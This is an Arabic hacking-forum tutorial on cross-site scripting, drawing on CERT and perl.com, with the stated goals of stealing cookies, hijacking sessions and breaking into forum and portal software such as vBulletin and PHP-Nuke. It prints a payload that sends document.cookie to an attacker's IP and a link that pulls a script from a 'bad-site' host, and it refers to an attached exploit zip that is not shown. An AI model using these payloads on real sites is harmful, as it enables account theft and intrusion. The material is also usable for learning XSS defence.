نظرا لاهمية الموضوع التالي وهو عبارة عن تجميعه من موقع سيرت وموقع بيرل بالاضافة الى بعض اللمسات
مني لتقريب واستغلال تلك , حول مشكلة او بالاحرى هشاشة امنية او ثغرة في مصطلحات الهكرز.
ارجو في حالة نقل الموضوع الاشاره الى مصدر وكاتب الموضوع .
===============================================================================================
المتطلبات :
معرفة تامه بلغة HTML
اطلاع غير متعمق على لغات السكربتينق وهي JAVASCRIPT ,PERL ,CGI ,VBSCRIPT
ومن وجهة نظر شخصية المصايب كلها من الجافا سكربت والهتمل
===============================================================================================
الاهداف المنشوده :
* افهام القارئ عن الكيفية التى يتم فيها سرقة معلومات هامه من جهاز المستخدم
* اختراق المنتديات من نوع VBULLETIN او YaBB and UBB او المجلات من البهب نيوك او بوست نيوك
*افهام القراء عن الكيفية التي تتم فيها سرقة الكوكيز او اختطاف الجلسة من المستخدمين
* ان يستطيع القارئ توسيع مداخل الاختراق
================================================================================================
جمله عرضية :
الاختراق ليس الا تشغيل للمخ واستغلال لاشياء لها فائده وارجو من يقرا هذا الموضوع بان يحاول التعود
على مسألة القراءة والترجمه ثم يلجأ الى التطوير ويترك عنه مسألة المطامر من منتدى لمنتدى او
المواقع التي تطرح الثغرات الامنية ...هل نحتاج الى امة تطور نفسها .. ام نطور انفسنا نحو الامية
================================================================================================
المشكلة :
كما هو معروف فان مستعرضات الوب مثل الاكسبلورر او نت سكيب ... الخ تاتي مترجمات النصوص او السكربتات
مبنية داخلها ويتم ترجمة السكربتات على جهاز المستخدم فلو اننا طلبنا صفحة كان بها سكربت معين
فان المستعرض يترجم هذا السكربت ويظهره على نفس الصفحه المطلوبه .
اما بالنسبة للمنديات او مجموعات النقاش فانها ترفض مثل هذه السكربتات وتعتبرها خرق للخصوصية
او قد تستغل في اغراض سيئة لسرقة معلومات حساسة من المستخدمين
المثال التالي يوضح كيفية ادراج السكربت :
Hello FOLKS board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
ان كلمة malicious code تم ادرجها او حقنها في بين علامتي السكربت وقد تحتوي على كود خبيث
يسرق او يرسل بيانات ... الخ لذلك فان مصمموا برامج المنتديات ومطوروا يمنعونها الا اذا مكنها الادمن
او المصمم او قد يتم استخدامها اذا مكن المنتدى تفيل HTML مثلا يتم ادراج السكربت مكان خاصية الامج
<script>document.write('<img src="http://my_ip_address/'+document.cookie+'">';</script>
او قد يستطيع السكربت ان يكتب على شكل رابط في صفحة او يرسل لك بالبريد او يرسل لك عن طريق المسنجر
والمثال التالي يوضح لك كيفية عمل رابط في صفحة
<A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>
انظر هنا وركز في كيفية عمل الكود انها فقط عندما يصلك باحد الطرق المذكوره اعلاه وتضغط عليه سينفذ السكربت
وللشرح اكثر لنفرض ان السكربت comment.cgi سكربت يرسل ملاحظاتك لصاحب الموقع او قد يكون سكربت للبحث
في الموقع او المنتدى وهو يحتوي على متغير داخله اسمه mycomment ياخذ المدخلات او الملاحظات التي تكتبها
فلو اعتبرناه انه سكربت بحث ويولد صفحات ديناميكية ناتجه من البحث ستكون النتائج وخيمة فبدل ان
ينتج الصفحات الحيوية او النشطه سينتج مايطلبه السكربت منه لاحظ الفكره هنا فقد ضمن السكربت داخل
حقل نصي فبدلا من ان ياخذ الحقل النصي نصوص استخدم ليأخذ اوامر من السكربت .
وحتى اعقد الامور اكثر
لاحظ المثال
التالي :<A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>
هنا استخدم نفس السكربت السابق لكن هذه المره طوره اكثر ليكون مستخدما في ادراج ملف من موقع اخر والذي
هو بالاسم BADFILE ولان مصدر البيانات ادخل فيه عدة مصادر اخرى عن طريق السكربت المذكور فأن هذا الهجوم
يسمى ب cross-site scripting او الترجمه من عندي " برمجة عبور الموقع " لاننا عبرنا باستخدام برمجة
السكربتات اكثر من موقع واذا كنت تلاحظ في السيكيورتي فوكس او المواقع الامنيه تختصر ب CSS وهي اختصار
ل cross-site scripting وليس ل CASCADE style sheets اي اوراق الانماط المتتالية
قد يدخل بدل الوسم او علامة السكربت اي من الوسوم التالية
<SCRIPT>, <OBJECT>, <APPLET>, and <EMBED>
ومن الممكن ان يكون هناك وسم النماذج <form> من وسوم HTML وبنفس الافكار السابقة يمكن تنفيذ الاوامر
منها لسرقة الكوكيز او بيانات اخرى او توجيهك لصفحات اخرى
اذا كنت قرات ماكتبته عن التكويد السداسي عشر واليونيكود تستطيع الان ان تفهم ما اقصده
المرفقات :
ملف zip يحتوي على الثغرات الامنية في منتديات vb ومنتديات yabb and ubb وثغرة عبور المواقع للمجلات
النيوك والبوست نيوك التي تمكنك من استغلال ماذكرته في الموضوع
================================================================================================
ولمزيد من التفاصيل :
http://www.cert.org/advisories/CA-2000-02.html
http://www.perl.com/pub/a/2002/02/20/css.html
ملف
مرفق :